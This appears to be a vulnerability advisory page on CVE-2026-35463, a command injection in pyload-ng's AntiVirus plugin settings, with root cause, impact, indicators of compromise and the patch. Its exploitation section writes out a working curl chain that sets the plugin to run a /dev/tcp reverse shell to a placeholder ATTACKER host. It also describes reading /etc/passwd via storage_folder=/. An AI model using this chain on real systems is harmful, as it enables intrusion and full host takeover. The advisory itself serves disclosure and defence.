CVE-2026-35463: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-35463 is an OS command injection vulnerability in pyload-ng (the next-generation pyLoad download manager) that allows a non-admin user with SETTINGS permission to achieve remote code execution by manipulating the AntiVirus plugin's executable path configuration. The flaw affects pyload-ng versions up to and including 0.5.0b3.dev96. It was reported by researcher axel-corsiez, published to the GitHub Advisory Database on April 4, 2026, and assigned a CVSS v3.1 base score of 8.8 (High) (Github Advisory, pyload Advisory).

Technical details

The root cause is an incomplete access control implementation (CWE-78) in core/api/__init__.py. The ADMIN_ONLY_OPTIONS protection mechanism correctly restricts sensitive core configuration values (reconnect scripts, SSL certificates, proxy credentials) to admin-only access, but this check is entirely absent for plugin configuration values. Specifically, the set_config_value() function calls self.pyload.config.set_plugin(category, option, value) for plugin configs without any role verification. The AntiVirus plugin's scan_file() method reads the user-controlled avfile and avargs config values and passes them directly to subprocess.Popen([avfile, avargs, target]), creating a direct path from user-controlled input to OS command execution. An attacker only needs a valid session with SETTINGS permission — no admin role is required (Github Advisory, pyload Advisory).

Impact

Successful exploitation grants an attacker arbitrary OS command execution with the privileges of the pyload-ng process, resulting in full confidentiality, integrity, and availability compromise of the host system. Beyond RCE, the advisory also identifies a secondary arbitrary file read vulnerability: by setting storage_folder=/ (also unprotected by admin checks) and using the GET /files/get/ endpoint, a non-admin user with SETTINGS and DOWNLOAD permissions can read any file accessible to the pyload process (e.g., /etc/passwd, private keys). Together, these issues allow privilege escalation from a low-privileged application account to full system access and potential lateral movement (Github Advisory, pyload Advisory).

Exploitability

A complete, functional proof-of-concept exploit using curl commands is publicly available in the official GitHub security advisory, demonstrating the full attack chain from config manipulation to reverse shell (pyload Advisory). The EPSS score is approximately 0.135% (33rd percentile), and there is no current evidence of in-the-wild exploitation or threat actor attribution. The vulnerability is not listed in the CISA KEV catalog. Qualys has added detection for this CVE (detection ID 5010448) (Github Advisory).

Exploitation steps

  1. Obtain a low-privileged session: Authenticate to the pyLoad web interface as a non-admin user who has been granted the SETTINGS permission. Capture the session cookie for use in subsequent API calls.

  2. Set the AntiVirus executable path to a shell: Send a POST request to the set_config_value API endpoint to replace the avfile config with /bin/bash:

curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \
  -d 'section=plugin' \
  -d 'option=AntiVirus.avfile' \
  -d 'value=/bin/bash'
  1. Set the AntiVirus arguments to a reverse shell payload: Configure avargs with the desired shell command:
curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \
  -d 'section=plugin' \
  -d 'option=AntiVirus.avargs' \
  -d 'value=-c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"'
  1. Enable the AntiVirus plugin: Activate the plugin so it runs on download completion:
curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \
  -d 'section=plugin' \
  -d 'option=AntiVirus.activated' \
  -d 'value=True'
  1. Trigger execution by adding a download: Submit any download package; when the download completes, AntiVirus.scan_file() is called, which executes subprocess.Popen(['/bin/bash', '-c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"', target]), delivering a reverse shell as the pyload process user:
curl -b session_cookie -X POST http://TARGET:8000/api/add_package \
  -d 'name=test' \
  -d 'links=http://example.com/test.zip'

(pyload Advisory)

Indicators of compromise

  • Network: Outbound TCP connections from the pyload server process to unexpected external IPs on non-standard ports (e.g., attacker's listener on port 4444); unusual POST requests to /api/set_config_value with parameters option=AntiVirus.avfile, option=AntiVirus.avargs, or option=AntiVirus.activated from non-admin user sessions.
  • Logs: pyLoad access logs showing repeated API calls to /api/set_config_value with plugin section parameters from low-privileged accounts; log entries for Writing config value AntiVirus/avfile or AntiVirus/avargs by non-admin users; unexpected add_package API calls shortly after config changes.
  • Process: Unusual child processes spawned by the pyload Python process, such as /bin/bash, nc, curl, or python with network-related arguments; processes with /dev/tcp/ in their command line.
  • File System: Unexpected scripts or binaries written to the pyload working directory or temp folders; new cron jobs or persistence mechanisms created under the pyload service account. (pyload Advisory)

Mitigation and workarounds

Apply the security patch from commit c4cf995a2803bdbe388addfc2b0f323277efc0e1, which introduces an ADMIN_ONLY_PLUGIN_OPTIONS set covering ("AntiVirus", "avfile") and ("AntiVirus", "avargs") and enforces admin-role checks for plugin config writes in set_config_value() (pyload Patch). As an immediate workaround, restrict the SETTINGS permission to trusted administrative users only, preventing non-admin users from accessing the vulnerable API endpoint. Longer term, validate that avfile resolves to a known, allowlisted antivirus binary before passing it to subprocess.Popen() (Github Advisory).

Community reactions

The Hacker Wire published a dedicated article covering the RCE via plugin config bypass (The Hacker Wire). The vulnerability was also noted on Mastodon by The Hacker Wire's account. Red Hat acknowledged the CVE in their security advisory tracker. Community discussion has been limited, consistent with the relatively low EPSS score and absence of confirmed in-the-wild exploitation.

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management